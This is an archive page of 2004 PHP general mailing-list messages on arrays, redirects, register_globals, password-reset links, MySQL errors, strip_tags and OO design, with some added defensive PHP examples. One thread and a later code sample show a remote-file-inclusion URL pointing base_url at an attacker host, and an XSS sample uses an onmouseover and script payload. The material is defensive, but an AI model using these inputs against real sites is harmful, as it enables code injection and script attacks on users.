> <[EMAIL PROTECTED]> wrote:
> > actually, what i mean is i need to get the animal name as well..
> >
> > ie:
> > echo $animal . ' : ' .  $total
> > would output:
> >
> >  : 
> >  : 
> >
> > etc. thanks.
> >
> >
> >
> > - Original Message -
> > From: "Sebastian" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Friday, December 10, 2004 12:24 PM
> > Subject: [PHP] array_merge_recursive
> >
> > > Hi.
> > >
> > > I am using this array_merge_recursive to merge two arrays, the array looks
> > > like this:
> > >
> > > Array
> > > (
> > > [0] => Array
> > > (
> > > [animal] => Dogs
> > > [total] => 5
> > >
> > > )
> > >
> > > [1] => Array
> > > (
> > > [animal] => Cats
> > > [total] => 3
> > > )
> > >
> > > [2] => Array
> > > (
> > > [animal] => Cats
> > > [total] => 6
> > > )
> > >
> > > )
> > >
> > > the output i need is:
> > > Dogs 5
> > > Cats 9
> > >
> > > I need to add the total but keep just one animal if its already there. can
> > > someone please help? i been stuck for two days. i appreciate it.
> > >
>
>
> -- 
> Craig Slusher
> Web Programmer
> [EMAIL PROTECTED]
>
>




Re: [PHP] Not quite PHP, but related...

2004-12-10 Thread Jonel Rienton
could header("Location: urlhere") be an alternative?
jonel
http://www.road14.com
http://www.filipinosrus.com
--
I not know English well, but I know 7 computer languages.
anonymous
On Dec 10, 2004, at 4:16 PM, Bruno B B Magalhães wrote:
> Hi you all,
> is that possible using .htaccess to redirect every request to a
> specified script?
>
> for example if you have:
> http://www.yoursite.com/en/articles/blab.html
> where there isn't a en dir., so it would be redirected to
> public_html/site
> I could use error page, but it won't receive post, get, cookie and
> session headers.
>
> Regards,
> Bruno B B Magalhaes


Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread KJ
Richard Lynch wrote:
>> Now in each instance register globals was on and all that was needed to
>
> You should turn register_globals off, first of all.

True, ideally register globals should be off.

> Secondly, something is very very very wrong in your analysis.

No it isn't.

> If this line of code gets executed:
> $base_url = '/home/expample.com/www';
> then the setting of register_globals can have *NO* effect on $base_url.

Yes...

> It is being initialized, as it should, to a correct value, in that line of
> code.  Any GET/POST data being sent in, is junked when that line is
> executed.

I know...

> Therefore, they must *ALSO* be surfing to a page which does not correctly
> 'include' the code which sets $base_url in the first place.

As I stated in my post...

> So, not only do you have register_globals "on" which is a Bad Idea, you've
> got PHP files in your web tree that they can surf to, bypass your
> configuration setting of $base_url, and execute code that the Programmer
> never ever ever intended to be executed out of sequence (IE, without
> having the code in config.php executed)
>
> This is a MUCH BIGGER PROBLEM than remote include working or not.

That's down to your opinion and experience. Most packaged applications 
have all the files accessible in the webdir. In most apps changing this 
would mean a lot of rewriting.

> If you can't do that, for whatever reason, you may be able to stop those
> files from being executed outside the context in which they were intended:
>  Convince Apache *not* to execute ".inc" files as PHP, for example.
>
> Of course, some well-intentioned, but badly-designed, packages use
> ".inc.php" to force the execution of "include" files as PHP.
>
> As we have seen here, you simply do not *want* that to happen.  Executing
> snippets of code out of the context in which they were programmed is just
> plain foolhardy.

I agree but your "perfect" world isn't the one I'm living in, if it 
were, we wouldn't have needed register_globals.

> If you only shut down remote include, but leave these other issues
> unaddressed, you're going to be restoring from a backup again sooner or
> later anyway.

Quite.

> You've got huge chunks of code in those packages that the bad guys are
> executing all out of any sort of order that the Programmer ever even
> thought about them.

So we agree that the programmer isn't always considering these things. 
Phew.

>> compromise the site was to have a variable passed in the url to set the
>> base url to a remote site, which in turn output php to execute, i.e.:
>> http://example.com/config.php?base_url=http://myhacksite.example.com
>> Now, you are correct that education on how to avoid this kind of issue
>> is key, however that does not avoid the problem. Turning off register
>> globals would prevent many of these attacks, however there are still
>> many apps out there that require register globals to be on and there are
>> other ways to use this exploit with them off.
>
> Please explain these other ways, or provide references.

Sorry, same way. I have seen an application that set the base url in 
$_REQUEST. Needless to say it was avoided like the plague. And to be 
honest, it was the only app I've seen that did this.

> Also, if an application requires register_globals on at this point in
> time, it may be prudent to simply not support the installation of that
> package.
>
> That may seem harsh, even unreasonable, but at some point, it's time for
> the application developers, who have quite some time now, to make their
> software well-behaved with register_globals OFF.

Yeah I agree... unfortunately there are hosting companies who insist on 
keeping them for BC.
And I was a bit shocked when this first happened to me with a stable 
version of phpBB. It has since been fixed, but I wonder how many people 
were open to the attack. I wonder how many people had not copied all of 
those include files out of the web dir? Many I imagine.

> I appreciate your problems -- I'm just trying to tell you that your
> solution is like swatting an elephant with a feather.

Rubbish. An enjoyable analogy nonetheless.
According to your logic, register globals wouldn't have been implemented 
because you could just loop through all the $_GET, $_POST ...etc and 
unset the global variable for each, and you should initialize every 
variable.
In the perfect world this would be true. But it ain't is it? RAD and all 
that. :)

In my opinion this would be the most elegant way of clearing up this 
problem for good, so instead of:

1. Turn off register_globals if possible.
2. Check every bit of source code to see if affected.
3. Change Apache config to not parse .inc files.
4. Educate the php world as to how to program in a nice and orderly fashion.

You would have:

1. Turn off allow_url_include if possible.

Anyway, I'm not going to argue the case for this any longer. I think 
it's a good idea but obviously nobody else does. The issue that I 
explained is avoidable, if it weren't then it would be a major 
exploit... that it is not. But it still remains an issue.

So yes, instead of having a language level featur
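
The pattern argued over in this thread, as an added PHP example that is not from any poster or from phpBB: an include file that can be requested directly and trusts `$base_url`, next to a hardened form. `APP_ENTRY`, `INCLUDE_GUARD`, `safe_include_path()` and the temporary directory layout are hypothetical; `allow_url_include` is the ini directive PHP later gained (in 5.2.0) for the switch KJ asks for.

```php
<?php
// Added example: APP_ENTRY, INCLUDE_GUARD and safe_include_path() are hypothetical names.

// --- Pattern from the thread (kept as a comment so it is never run) ---------
//   lib/common.php, reachable directly under the web root:
//       include $base_url . '/lang/en.php';
//   With register_globals on and config.php skipped, $base_url is whatever
//   the query string says, including a remote URL.

// --- Hardened form -----------------------------------------------------------
// 1. Entry scripts define a constant; constants cannot arrive via GET/POST.
define('APP_ENTRY', true);

// 2. Every include file starts with this guard, so requesting it directly
//    does nothing even when it has to stay inside the web root.
const INCLUDE_GUARD = "<?php if (!defined('APP_ENTRY')) { http_response_code(403); exit; }\n";

// 3. Include paths are resolved against a fixed root and checked.
function safe_include_path(string $root, string $relative): string
{
    // Anything with a scheme prefix (http://, ftp://, php://, data:) is refused.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative) || strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException("refused (scheme or NUL): $relative");
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        throw new InvalidArgumentException("include root does not exist: $root");
    }
    // realpath() resolves ".." and symlinks, and returns false for missing files.
    $full   = realpath($rootReal . DIRECTORY_SEPARATOR . $relative);
    $prefix = $rootReal . DIRECTORY_SEPARATOR;   // trailing separator matters
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException("refused (outside include root): $relative");
    }
    return $full;
}

// --- Constructed layout for the demonstration --------------------------------
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/lang', 0700, true);
file_put_contents($root . '/lang/en.php', INCLUDE_GUARD . "return ['hello' => 'Hello'];\n");
// A sibling file whose name shares the root's prefix but lives outside it.
$outside = $root . '_outside.php';
file_put_contents($outside, "<?php return ['hello' => 'not ours'];\n");

$candidates = [
    'lang/en.php',
    'http://myhacksite.example.com/lang/en.php',   // URL form quoted in the thread
    '../' . basename($outside),
];
foreach ($candidates as $candidate) {
    try {
        $strings = include safe_include_path($root, $candidate);
        echo "included $candidate => ", json_encode($strings), "\n";
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), "\n";
    }
}

// The directive exists independently of the checks above; report its setting.
echo 'allow_url_include = ', var_export(ini_get('allow_url_include'), true), "\n";

// Clean up the constructed files.
unlink($root . '/lang/en.php');
rmdir($root . '/lang');
rmdir($root);
unlink($outside);
```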

Re: [PHP] Launch windows application and fle

2004-12-10 Thread Richard Lynch
Chris Mason wrote:
> I have an internal application requirement to generate a webpage that
> lists
> media files (movies) on our linux server and when the user clicks the name
> of the file on the webpage, launch the application on the local machine
> playing the correct file. How can I accomplish that? I know the computers
> that will be used, this is not on the internet so there are no security
> concerns. I can change and configure the browsers at will, this is a
> single
> purpose computer under my direct control on which I have installed the
> application.

The easiest and cheapest way, under those circumstances, is to turn ON the
directory listing feature in Apache in httpd.conf (or .htaccess) for that
directory and throw the video files in that directory.

You'll also get some free bonuses in cool little icons for the files, and
their sizes (sometimes important for video choice by a user) displayed.

If that bothers you, then a combination of:
http://php.net/opendir
http://php.net/readdir
and possibly http://php.net/readfile if you want to keep the video files
to live outside the web tree.
should make this a 5-line job of about an hour or two of work.

See the rather long thread about Security from the past few days about the
pros and cons of this.

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] Re: PHP Security

2004-12-10 Thread rogerk
Quoting Richard Lynch <[EMAIL PROTECTED]>:
> Actually, internally, it *is* a file, or part of a file, depending on the
> database implementation details. (*)

Part of a file?  Usually.  A file?  Rarely.

And as part of a file, it is likely to be accessed using a more poorly chosen
I/O model than if it were in a standalone file.

> So you're adding overhead into the storage and retrieve of your content
> for some unspecified (so far) benefit.

The benefit is clear.  If the so-called file is only going to be used by a
single PHP-plus-database application and never passed to a normal OS command
that operates on files, cool.  If it is to be accessed by multiple methods,
especially by normal OS-level processes, extracting it from a database into a
temporary file so it can be accessed by those commands each time is ridiculous.




Re: [PHP] user password managment

2004-12-10 Thread Richard Lynch
> Does anybody have any tips or links for creating a system for managing
> user's passwords. I want to make it so that when a user is created, an
> email is sent with a link that allows them to set their password. The
> link should only work for a set amount of time. I have ideas for
> implementing something, but I have a hunch that there is some code
> already out there for this. Does anybody know of any? Thanks!

Use the sample code in http://php.net/md5 to create a hash, and store that
in your database with a datetime value of now().  The hash will be quite
unpredictable by the Bad Guys.

Send that hash as part of the link in your email, and compare that hash to
yours in the database.

To make it even harder to bust, store the http://php.net/crypt *of* the
md5 hash value, so that the actual value in the database is not what they
need to send, but you can crypt what they send to see if it is the correct
value.  That way, if somebody gains access to read your database, the
values stored there do them no good.

Course, it's more likely that somebody will gain access to the recipient's
email, but there is little you can do about that in today's environment. 
Digitally-signed and secure email is nowhere near pervasive enough.

An alternative is to send them a randomly-generated password, storing only
the crypt() of it, of course, and then force them to change the password
on first login.

Since some email clients have a tough time getting long URLs, this can be
less intensive on your Support/Help resources (your time) and it's really
not a lot less secure than the long URL method.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
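
The expiring set-password link described above, as an added example rather than code from the thread. It swaps in `random_bytes()` and SHA-256 for the md5()/crypt() pair the message names and `password_hash()` for storing the password; the `password_setup` table, the function names, the `app.example` URL and the use of PDO SQLite are assumptions.

```php
<?php
// Added example: table, function names and URL are hypothetical.
// Assumes the pdo_sqlite extension; an in-memory database keeps it self-contained.

const TOKEN_TTL = 86400;   // link lifetime in seconds (assumed policy: 24 hours)

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE password_setup (
    user_id    INTEGER NOT NULL,
    token_hash TEXT    NOT NULL UNIQUE,   -- only a hash of the token is stored
    expires_at INTEGER NOT NULL,
    used_at    INTEGER                    -- NULL until the link is redeemed
)');

// Create a token for a new user; the return value goes into the mailed link.
function issue_setup_token(PDO $db, int $userId, int $now): string
{
    $token = bin2hex(random_bytes(32));   // 256 bits from the system CSPRNG
    $stmt  = $db->prepare(
        'INSERT INTO password_setup (user_id, token_hash, expires_at) VALUES (?, ?, ?)'
    );
    $stmt->execute([$userId, hash('sha256', $token), $now + TOKEN_TTL]);
    return $token;
}

// Redeem a token from the link. Returns the user id, or null when the token
// is malformed, unknown, expired or already used.
function redeem_setup_token(PDO $db, string $token, int $now): ?int
{
    if (!preg_match('/^[0-9a-f]{64}$/', $token)) {
        return null;
    }
    $hash = hash('sha256', $token);
    // One UPDATE both checks and consumes the token, so two concurrent
    // requests cannot redeem the same link.
    $stmt = $db->prepare(
        'UPDATE password_setup SET used_at = ?
          WHERE token_hash = ? AND used_at IS NULL AND expires_at > ?'
    );
    $stmt->execute([$now, $hash, $now]);
    if ($stmt->rowCount() !== 1) {
        return null;
    }
    $lookup = $db->prepare('SELECT user_id FROM password_setup WHERE token_hash = ?');
    $lookup->execute([$hash]);
    return (int) $lookup->fetchColumn();
}

// --- Demonstration with constructed values -----------------------------------
$now   = time();
$token = issue_setup_token($db, 42, $now);
echo "Link to mail: https://app.example/set-password?token=$token\n";

echo 'first use:   '; var_dump(redeem_setup_token($db, $token, $now + 60));
echo 'replay:      '; var_dump(redeem_setup_token($db, $token, $now + 120));

$late = issue_setup_token($db, 43, $now);
echo 'after expiry: '; var_dump(redeem_setup_token($db, $late, $now + TOKEN_TTL + 1));
echo 'unknown:     '; var_dump(redeem_setup_token($db, str_repeat('0', 64), $now));

// A read-only look at the table shows no value that works in a link.
foreach ($db->query('SELECT user_id, token_hash, used_at FROM password_setup') as $row) {
    echo "stored: user {$row['user_id']} hash {$row['token_hash']}\n";
}

// After a successful redeem the application stores only a password hash.
$stored = password_hash('constructed sample passphrase', PASSWORD_DEFAULT);
echo 'password check: '; var_dump(password_verify('constructed sample passphrase', $stored));
```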



Re: [PHP] Apache - MySQL connection via PHP

2004-12-10 Thread Richard Lynch
Mike Francis wrote:
> Hi,
> I am having a problem connecting to a MySQL database via PHP.
>
> I have Apache 2.0.52, PHP 5.0.2 and MySQL 4.1 installed and working OK
> individually.
> I have copied phpmysql.dll and mysqli.dll at different times to
> Windows/System32.
> I have set up a successful MyODBC connection with the database - so it
> exists.
> I can access MySQL from the command prompt, and from a web interface with
> no problem.
> However, when I run the following code I get a "Unable to connect to the
> database server at this time." error message.

>// Connect to the database server
>  $dbcnx = @mysql_connect('localhost', 'root', 'thisismypassword');
>  if (!$dbcnx) {
>  exit('Unable to connect to the ' .
>  'database server at this time.');


I believe http://php.net/mysql_error could be used in your code right before the
first 'exit' to give you more information.

Also try taking out the '@' for a trial run, just to see if you get a
useful error message from that.

You can put '@' back in after you fix this problem -- but it would be even
better to add an http://php.net/error_log before that exit with
http://php.net/mysql_error so that you can log your errors to the Apache
error log.

Then, when you have problems, you have to remember to open up your Apache
error log file.

In a standard install, that's:
C:\Program Files\Apache Group\apache2\logs\error_log
I do believe.

PS Excellent post, particularly the efforts to ensure that MySQL was
running/working!

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] Question:maybe urldecode

2004-12-10 Thread Richard Lynch
Stuart Felenstein wrote:
>
> --- Jason Wong <[EMAIL PROTECTED]> wrote:
>
>> > Nothing is printing out on $_POST['var'] or $var
>> > s makes sense.
>>
>> Now why are you looking in $_POST for your form
>> values? They're in $_GET. You
>> said earlier that you understood POST and GET?
>
> I made the correction , using $_GET now.  Values are
> printing out, aside from the select lists (arrays)
> which print out as "array".

Yes.

An array will print as "Array"

You'll need to dig into the Array for what you need, or implode it, or
something.

We can't decide for you what you need to do, however.

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] encrypt/decrypt sqlite data

2004-12-10 Thread Richard Lynch
Shawn McKenzie wrote:
> This is my first adventure with mcrypt and also the sqlite stuff.
>
> Via file upload I am getting a SQL dump file and running it as a query
> to insert data into a sqlite db.  This works great.
>
> Then I am trying to use an update query to encrypt fields in all rows by
> using the sqlite_create_function to run my encryption function that uses
> $_SESSION['key'] which is an md5 hash of a pass phrase):
>
>   $db = sqlite_open("db");
>   sqlite_create_function($db, 'enc', 'encrypt', 1);
>
>   $sql  = 'UPDATE mytable SET f1=enc(f1);'
>   .'UPDATE results SET f2=enc(f2);';
>
>   sqlite_query($db, $sql);

What are the data types of f1 and f2?

Are you sure they are large enough to hold the result of enc()?

If data is getting a little truncated, or not encrypted/decrypted at the
end...

Some encryption functions require input data to be 'padded' to an even
multiple of a certain length.  EG, it must be an even multiple of 32-bytes
to be encrypted/decrypted.

Others, I think, pad the results with spaces for similar reasons.

So, possibly, somewhere in all of this, you just need to tack on:
length(x)%32 spaces to your text.

Or maybe you need to be more careful about using trim() and similar
functions in there.

>
> function encrypt($txt)
> {
>   $key = $_SESSION['key'];
>   $txt = trim($txt);

I don't think any of the encryption routines care about line feeds, though
the functions you use to process in a shell script or even mysql_query()
*might*...

-- 
Like Music?
http://l-i-e.com/artists.htm




RE: [PHP] Multiple Inheritance

2004-12-10 Thread Justin Palmer
Hi,

Have you ever written a project and then moved to the next noticing that
you are doing some of the same things from last project (connecting to a
database, reading a file, writing to a file, etc...)?

Have either of you ever written a for loop? Of course, you have.

Have you ever written the for loop and then noticed (after you uploaded
the script to the server) that you wrote the loop with syntax errors?

If so, why not use an ArrayIterator?  If not, then you are a master in
the PHP realm.  I would have to assume that even the most experienced
php developer has done this once or twice in their life. It all amounts
to a waste of precious programming time when this occurs.  Especially
when TIME = MONEY.

What if you were to build an application around the MySQL database.  You
have just finished the project and you are taking it to your boss.  You
get there and then your boss says, "you know what I would rather use
Oracle as our database".  With this situation you have, potentially,
wasted many hours writing the MySQL version.  What are you going to do
now, say something like, "Sorry boss, my application I designed is not
flexible enough for me to switch db's at this time.", as your promotion
for completing the project goes down the drain.

There are large arguments about both, I grew up on OO so that is how I
program and that is what I know.  Procedural does not even make sense to
me.  Using low-level functions and process over and over again, when the
functions and process can be written once and used on many projects over
and over again.

Also, do you ever go back and maintain projects that you have worked on
a year later.  If you used objects you would know exactly what you are
walking into, I doubt you can say that with a procedural state of mind.

Resources to learn more:

www.phppatterns.com
wact.sf.net
http://www.sitepoint.com/forums/forumdisplay.php?f=147
www.martinfowler.com

There are more resources: -> google is your friend.

I would put Pear, but personally I think that it started out to be a
good idea and has turned into a disaster, IMO. (Sorry to any Pear
lovers, I still think Pear is better than procedural).

I don't care if you program in procedural or oo, but I would like you to
educate yourself in the pluses and minuses of both.  If you have not
learned oo and know nothing about it, then learn it; it might surprise you.

I think the main problem is that PHP is still young in the OO world, it
grew up on procedural.  With this in mind there is no OO Standard that
people follow, like in Java, or .NET.  Pear is trying to address this
issue, but if you are not a Pear believer then you use some other
Standard, and so the cycle of NO STANDARD revolves.

And after saying all that, I will say that there are times on very small
projects that procedural does make more sense.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );


-Original Message-
From: Mike [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 11:08 AM
To: 'PHP General'
Subject: RE: [PHP] Multiple Inheritance


Richard,

Thank you for that.

I've been writing PHP apps for a while now but would not consider myself
an "expert". I just enjoy doing it and I know a fair bit about what I'm
doing. One thing I never quite got into (with PHP) is OO. Why - because
nothing I ever did really seemed to make sense as OO. I could easily
write a function that'd get called one or a few times and that was about
it. There didn't seem to be a need for objects to be used and re-used
and my scripts shouldn't ever run long enough for me to take advantage
of OO's abilities.

I was worried that I "didn't get it" (and I still might not... But
that's another issue) but maybe I'm not too far off the mark. It's just
useful to see other people's opinions on this topic. 

Maybe I'll be burned at the stake along with you... ;)

-M


> > What are some of the things you guys do to get around the fact that
> > classes in php4 can't do multiple inheritance?
> 
> What I do is not use classes.
> 
> At all.
> 
[snip] 
> I will probably be reviled as a heretic, but there it is.
> 



RE: [PHP] Multiple Inheritance

2004-12-10 Thread Richard Lynch
> Have you ever written a project and then moved to the next noticing that
> you are doing some of the same things from last project (connecting to a
> database, reading a file, writing to a file, etc...)?

Not quite the same thing.

When it is exactly the same thing, I just copy & paste the code.

Or, more likely, already have done that and changed it to a function.

> Have either of you ever written a for loop? Of course, you have.

Sure, though not very often.  I use while() a whole lot more.

> Have you ever written the for loop and then noticed (after you uploaded
> the script to the server) that you wrote the loop with syntax errors?

Rarely.

And only a very very very tiny percentage of my time is spent fixing typos
in syntax errors.

I spend a *LOT* more time, digging through endless class files, of what
are essentially name-spaces of singleton "objects" trying to find the line
of code some idiot typed that is doing the wrong thing, but starting from
'index.php' I have *NO* *IDEA* how it got in there.

I end up having to "grep" source code just to find the damn thing.

This doesn't happen in good code, whether it's OO or Procedural.

My point remains:

Inexperienced programmers being pushed to write OO code are going to write
*WORSE* code than inexperienced programmers being forced to write
Procedural code.

The exception is if you have a fairly large TEAM of programmers, one of
which is a *VERY* experienced Architect who designs the OO framework, and
the less-experienced Programmers code the details on that framework within
the confines of the framework.

What I continually run into, however, is an inexperienced programmer,
grossly mis-using OO bits and pieces, in ways and means that make
unfathomable code.

I truly believe we should simply not encourage inexperienced programmers
to *design* systems, on their own, with OO (except as an exercise).

You just end up with this larger mess of objects flying around in no real
order or pattern that makes any sense at all.

> If so, why not use an ArrayIterator?  If not, then you are a master in
> the PHP realm.  I would have to assume that even the most experienced
> php developer has done this once or twice in their life. It all amounts
> to a waste of precious programming time when this occurs.  Especially
> when TIME = MONEY.

H.  Let's see.

You want me to learn a whole new syntax, with a whole new ArrayIterator
thingie, so I can have more syntax to memorize, and get wrong, and so I
can type more, and so I can have more lines of code to maintain.

No, thank you.

Been there; done that; hated it.

And I had *more* syntax errors, not less.  Not to mention *more* bugs,
sometimes very subtle bugs, introduced by the stupid Iterator classes.

It's really really really hard to not understand what:
for($i = 0; $i < 10; $i++)
does after a few weeks of study.

The same cannot be said of the ArrayIterator counterpart.

> What if you were to build an application around the MySQL database.  You
> have just finished the project and you are taking it to your boss.  You
> get there and then your boss says, "you know what I would rather use
> Oracle as our database".  With this situation you have, potentially,
> wasted many hours writing the MySQL version.  What are you going to do
> now, say something like, "Sorry boss, my application I designed is not
> flexible enough for me to switch db's at this time.", as your promotion
> for completing the project goes down the drain.

Hey boss, I wrote this application with performance in mind, and switching
to Oracle will be very easy, but some of the more complex queries will
need to be tweaked once we find out which ones Oracle excels at.

How many real-world users switch from MySQL (free) to Oracle (very not
free) with such short notice?

> There are large arguments about both, I grew up on OO so that is how I
> program and that is what I know.  Procedural does not even make sense to
> me.  Using low-level functions and process over and over again, when the
> functions and process can be written once and used on many projects over
> and over again.

I grew up on OO, using it extensively after one (1) semester of PL/1 in
college, continuing to use it for over two decades, and will happily use
it WHEN IT MAKES SENSE.

If you view procedural programming as not re-using code, then you're not
writing good procedural programming.

More importantly, your OO programming probably isn't all that re-usable
either, as the basic rules and paradigms of code re-use transcend OO and
procedural implementation.

> Also, do you ever go back and maintain projects that you have worked on
> a year later.  If you used objects you would know exactly what you are
> walking into, I doubt you can say that with a procedural state of mind.

Bull!

Bad OO programming, or Bad procedural programming will make
un-maintainable code.

The converse is also true:  Good procedural programming is just as easily
maintained as good OO programming.

I've h

[PHP] flash data grid + php

2004-12-10 Thread blackwater dev
Is anyone using one of the flash data grids within their php
application?  I am looking to do the same thing but didn't know if it
is more work than it's worth.

Thanks!




Re: [PHP] Forms In PHP

2004-12-10 Thread Richard Lynch
Wil Hitchman wrote:
> I created a web form in PHP and used a couple of email addresses.  The
> only email address that worked when I submitted to the form (for testing
> purposes) was my Yahoo address.  My AOL, hotmail and other work addresses
> did not work.  Can someone tell me why?

Technically, "To: " is only supposed to allow one (1) email address.

Assuming you are using sendmail or one of its popular drop-in
replacements, they will support "To: " with multiple emails, but it's not
RFC that they have to.

So while I don't think it's the real problem, you're better off using "Cc:
" headers in the optional fourth argument to http://php.net/mail to be
standards-based.

Most likely, however, the email you sent was flagged as spam by AOL and
hotmail, but not yahoo.  So the email got sent just fine, but they throw
it out before you ever saw it.

You can research how spam filters work to make your email look less like
spam and try again.

Unless you plan on sending spam, in which case you should just quit :-)

-- 
Like Music?
http://l-i-e.com/artists.htm





Re: [PHP] recompiling php

2004-12-10 Thread Khan
blackwater dev wrote:
> I am a linux newbie and I have php 4.3.8 and Apache 2 installed that
> was installed with the Fedora 2 install.  I am getting errors that php
> wasn't compiled with mysql support so now I am trying to do that but
> get this error when I try to compile:
>
> Sorry, I cannot run apxs.  Possible reasons follow:
>
> 1. Perl is not installed
> 2. apxs was not found. Try to pass the path using --with-apxs2=/path/to/apxs
> 3. Apache was not built using --enable-so (the apxs usage page is displayed)
>
> I did a locate on my box and it just seems to find the apx manuals.
> What should I do?  Recompile apache?  Try to find apxs?

install apt-get and then #apt-get install php-mysql


Re: Re: [PHP] Close all open tags in HTML text

2004-12-10 Thread John Holmes
> From: "Richard Lynch" <[EMAIL PROTECTED]>

> Matt Palermo wrote:
> > but just make sure that ending
> > tags exist, so it doesn't screw up the rest of the page.  Strip tags would
> > just wipe out the HTML rather than allowing it and ending it safely.
> 
> Strip tags will allow you to wipe out *DANGEROUS* HTML which will make
> your web server a source of problems not only to you, but to me as well.
> 
> Please use strip_tags to allow only the tags you *NEED* the users to be
> able to use.
> 
> It will only take you seconds, and it will save you (and us) a lot of
> grief in the long run.

strip_tags() is a rather worthless function, if you ask me. It strips such evil 
code as  or anything else surrounded by < and >. Its "allowed tags" 
attribute is misleading, also. You can think you're safe by allowing  tags, 
but I can include onmouseover (or any other) events to trigger javascript and 
XSS attacks. 

You're better to roll your own solution or just run everything through 
htmlentities()/htmlspecialchars() and show the user exactly what they typed. 

I'm on a crusade against the use of strip_tags(), if you haven't figured that 
out yet. :)

---John Holmes...

UCCASS - PHP Survey System
http://www.bigredspark.com/survey.html

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
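
What the two positions in this thread look like on one input, as an added example that is not any poster's code: `strip_tags()` with allowed tags, `htmlspecialchars()`, and a small allow-list filter built on DOMDocument that drops every attribute and re-serialises the fragment so open tags get closed, which is what Matt Palermo asked for. `sanitize_fragment()`, `render_node()` and the tag lists are hypothetical, and the sample input is constructed.

```php
<?php
// Added example: function names and tag lists are hypothetical.
// Assumes the dom extension (enabled by default in PHP builds).

const ALLOWED_TAGS      = ['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li'];
const DROP_WITH_CONTENT = ['script', 'style', 'iframe', 'object', 'embed'];
const VOID_TAGS         = ['br'];

// Serialise one DOM node using only allow-listed tag names and escaped text.
function render_node(DOMNode $node): string
{
    if ($node instanceof DOMText) {                 // includes CDATA sections
        return htmlspecialchars($node->nodeValue, ENT_QUOTES, 'UTF-8');
    }
    if (!($node instanceof DOMElement)) {
        return '';                                  // comments, processing instructions
    }
    $name = strtolower($node->nodeName);
    if (in_array($name, DROP_WITH_CONTENT, true)) {
        return '';                                  // element and everything inside it
    }
    $inner = '';
    foreach ($node->childNodes as $child) {
        $inner .= render_node($child);
    }
    if (!in_array($name, ALLOWED_TAGS, true)) {
        return $inner;                              // unknown tag: keep text, drop markup
    }
    if (in_array($name, VOID_TAGS, true)) {
        return "<$name>";
    }
    // Attributes are never copied, so event handlers and style cannot survive,
    // and the closing tag is always emitted.
    return "<$name>$inner</$name>";
}

// Parse an untrusted fragment leniently and re-emit it through render_node().
function sanitize_fragment(string $html): string
{
    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);       // malformed input is expected
    // The meta tag makes libxml read the bytes as UTF-8; the <div> wrapper keeps
    // bare text from being wrapped in an implied <p>.
    $doc->loadHTML(
        '<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><div>'
        . $html . '</div>'
    );
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $body = $doc->getElementsByTagName('body')->item(0);
    return $body === null ? '' : render_node($body);
}

// Constructed sample: an event-handler attribute, two unclosed tags, a script.
$input = 'Hello <b onmouseover="alert(1)">bold <i>and italic<script>alert(2)</script>';

echo "strip_tags with <b><i> allowed:\n  ", strip_tags($input, '<b><i>'), "\n";
echo "htmlspecialchars:\n  ", htmlspecialchars($input, ENT_QUOTES, 'UTF-8'), "\n";
echo "sanitize_fragment:\n  ", sanitize_fragment($input), "\n";
```

Run it and compare the three lines: the first keeps the attribute and leaves both tags open, the second shows the user exactly what was typed, the third keeps the formatting without either problem.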



Re: [PHP] How to post form-data to a host using PHP

2004-12-10 Thread Khan
Yao, Minghua wrote:
> Hi,
> Does anybody know how to post form-data to a host using PHP? Thanks for the
> answer.
> -Minghua

http://www.tizag.com/phpT/forms.php Enjoy
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


RE: [PHP] Spurious newlines when requesting empty php file

2004-12-10 Thread Michael Sims
Richard Lynch wrote:
> Carl Michael Skog wrote:
>> I would have thought that the response from a empty php file would
>> also be empty, but, to my surprise, they consist of 3 newlines !!!
>
> I just tried this with an empty PHP file, and got exactly what I
> expected.
>
> A valid response with no content at all.
>
> Please specify your software versions, and provide URLs and, as silly
> as this sounds, an "ls -als empty.php" so we can see your empty PHP
> file.

Maybe he's using "lynx -dump " to test this.  Lynx adds several newlines to the
output.  However, Links does not:

$ touch empty.php
$ lynx -dump http://localhost/empty.php | od -c
000  \n  \n  \n
003
$ links -dump http://localhost/empty.php | od -c
000

Just to add to the guessing... :)

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-10 Thread Richard Lynch
>> Yeah, with any luck at all, your binary file will corrupt itself, and then
>> make your entire database unreadable by anybody, even you.
> really? Then my company's database should be corrupt by now...right? Haven't
> had any problems yet. Well, it's only been running for 2 years now.

Search the archives.  There are known instances of what I described
happening.

I'm not claiming it's common.

It's *more* common than a single corrupt file in the file system trashing
the entire file system, taking all your data with it.

What exactly does storing the binary file in SQL get you?

Does your SQL search through the binary data doing a face-recognition
match in some customer MySQL library code to find criminals by facial
features?

[shrug]

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Multiple Inheritance

2004-12-10 Thread Greg Donald
